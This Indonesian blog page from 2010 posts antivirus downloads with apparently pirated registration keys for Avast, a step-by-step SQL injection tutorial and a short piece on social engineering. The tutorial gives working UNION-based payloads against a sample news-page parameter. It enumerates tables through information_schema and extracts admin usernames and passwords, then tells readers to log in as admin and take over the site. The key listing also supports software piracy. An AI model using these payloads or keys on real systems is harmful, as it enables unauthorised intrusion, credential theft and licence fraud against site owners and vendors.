Rabu, 29 Desember 2010

NOD32 Antivirus 4.0.424 Full




ESET NOD32 Antivirus merupakan sistem antivirus yang mementingkan keseimbangan, dan meberikan perlindungan terhadap PC anda dari ancaman virus. Antivirus NOD32 dapat bekerja dengan baik pada berbagai platform dari microsoft windows melalui sejumlah UNIX / linux, Novell, Lotus Domino dan berbagai mail server.

NOD32 dapat menghapus trojans, virus, worm dan malware tanpa merusak data berharga anda. pendeteksian advanced metode di implementasikan dalam perangkat lunak guna memberikan perlindungan terhadap ancaman virus baru. versi keempat dari NOD32 ini memiliki kelebihan scaning yang lebih cepat dan menggunakan sytem resource yang sangat rendah sehingga lebih ringan dijalankan. NOD32 dapat melakukan scaning 2-50 kali lebih cepat dibandingkan antivirus lain, sehingga mendapat berbagai penghargaan internasional.
Features of NOD32 :

· ThreatSense technology - a single optimized Anti-Threat engine for analyzing code to identify malicious behavior, such as viruses, spyware, adware, phishing and more
· Unprecedented heuristic analysis capable of discovering new malware threats as they emerge
· Powerful virtual PC emulation technology enables unpacking and decryption of all types of archives and run-time packing
· Able to clean active malware running in memory
· Protects at multiple infiltration points, including HTTP, POP3, SMTP and all local and removable media
· Removes infections from files that are locked for writing (e.g., loaded DLL file)
· Prevents infected files from being opened and executed, and warns on creation of infected files
· Automatic execution on system startup
· Supports multiple Terminal Server environments
· Supports scanning of mapped network disc

Download Disini Gan

Semoga bermanfaat...:)



ESET Smart Security



ESET Smart Security adalah solusi terintegrasi dirancang untuk melindungi komputer dari berbagai ancaman. Dibangun pada pemenang penghargaan ESET NOD32 ® Antivirus dan kuat ThreatSense perusahaan mesin ®, ESET Smart Security menyediakan antispyware, antispam dan fitur firewall disesuaikan. Memanfaatkan ThreatSense – heuristik industri paling maju – jendela kerentanan antara wabah virus dan update signature dikurangi.

Keuntungan utama dari pendekatan ini adalah bahwa modul perlindungan individu dapat berkomunikasi untuk menciptakan sinergi yang tak tertandingi untuk meningkatkan efisiensi dan efektivitas perlindungan. Selain itu, arsitektur terintegrasi jaminan penggunaan optimal dari sumber daya sistem, jadi ESET Smart Security juga terus ESET’s tahu reputasi untuk memberikan batuan padat keamanan di tapak kecil yang tidak akan memperlambat komputer individu.
Perubahan 4. ESET Smart Security:

* Fix: Penciptaan profil temporer pada sistem Windows 7
* Fix: daftar tidak konsisten sambungan aktif dalam GUI dan di jendela baru yang terbuka
* Fix: Windows 2000, Vista dan sistem yang lebih baru: Masalah dengan otentikasi melalui server otentikasi
* Fix: ESI memori kebocoran pada sistem x64
* Fix: Masalah dengan folder cluster ClusterStorage
* Fix: tombol pengaturan default tidak berfungsi dengan benar
* Fix: Windows Live Mail kecelakaan terjadi secara acak ketika DEP (Data Execution Prevention) diaktifkan untuk wlmail.exe
* Fix: Outlook integrasi masalah setelah menginstal ulang dari EAV ke ESS
* Fix: GUI crash ketika pemindaian e-mail.
* Fix: Taskbar warna dan jendela ikon tidak disinkronkan dengan warna ikon systray
* Fix: perlindungan real-time tidak bekerja setelah instalasi ulang dari EAV / ESS
* Peningkatan: Ditambahkan dukungan MS Outlook 2010
* Fix: deteksi Ditambahkan MS Outlook Klik untuk Jalankan instalasi 2010
* Fix: Masalah dengan firewall yang tidak berfungsi karena masalah dengan inisialisasi driver NDIS
* Fix: pesan Tag ditambahkan juga untuk membersihkan email yang dikirim dari Outlook Express
* Fix: tooltips ditampilkan bahkan dengan
Tampilkan tooltips
pilihan dinonaktifkan
* Fix: Thunderbird: Konsep digandakan oleh fitur auto save

Download'a Disini Gan

Semoga bermanfaat bagi semua nya..:)




Avast 5.0 Free Edition with Key Registration




Fitur-fitur Avast 5.0 Free Edition antara lain :

* Proteksi dari virus dan spyware secara terus menerus
* Memastikan email yang dikirim dan di terima aman.
* Melindungi dari infeksi ketika sedang chatting
* Melindungi dari website yang berbahaya, ketika browsing
* Anti rootkit ( real time)
* Web shield
* IM/P2P shiled
* Network Shield
* Behavior shield
Fitur dan penjelasan lebih lengkapnya silahkan melihat Avast Free Download. Versi baru ini memberikan perbaikan pada engine Antivirus dan antispyware intelligent scanner, Silent/Gaming mode dan juga Behavior shield. Jika ingin mengetahui perbandingan antara Free Edition, Pro editian dan Internet Security, silahkan melihat Perbandingan Edisi Avast

Sistem minimal yang dibutuhkan:
* Processor Pentium 3, 128 MB RAM, 100 MB of free hard disk space
* Microsoft Windows 2000, Microsoft Windows XP/Vista/7 (32/64 bit)

Melihat fitur serta tampilan barunya, Avast 5.0 Free ini memang patut untuk dicoba, sebelumnya saya kurang suka dengan tampilannya yang seperti media player (meskipun skin bisa diganti). Tetapi kali ini tampilan tampak lebih segar. Bagi anda yang memerlukan antivirus gratis dengan fitur lengkap, Avast ini mungkin solusinya
Download Avast 5.0 Free Edition (sekitar 38.3 MB)


untuk key regist nya coba pake yang ini gan
[code]yang ini
-S2912937R9950A0912-21768JYV

atau yang ini
-S8869028R9958A0911-XWM2CN2H

yang ini juga boleh
-S6363585R9954A09-JLK7K10V[/code]





Selasa, 28 Desember 2010

SQL Injection step by step

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100? atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)…
misal: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–
sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–
===========
step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–
seumpama table yang muncul adalah “admin”
===========
step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.
tables+where+table_schema=database()–
=============
step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.
columns+where+table_name=0xhexa–
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
silakan mengkonversinya di link bawah ini :
http://www.fadli-tn.info/tools/ascii
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.
columns+where+table_name=0×61646D696E–
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0×3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,hasil isi column),6,7,8+from+(nama table berasal)–
contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,id,username,password),6,7,8+from+admin–
==============
[+] step Delapan:=
==============
tahap terakhir mencari halam admin atau login
selanjutnya terserah anda karena kekuasaan web ada di tangan anda…

Pengertian Social Engineering (SE)

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai penipuan. Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.
Social Engineering merupakan seni memaksa orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja pemaksaan yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban.

Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.
Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem. Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. Sehebat apapun pertahanan kita, jika kita sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi kita sendirilah yang membukakan jalan masuk bagi sang attacker.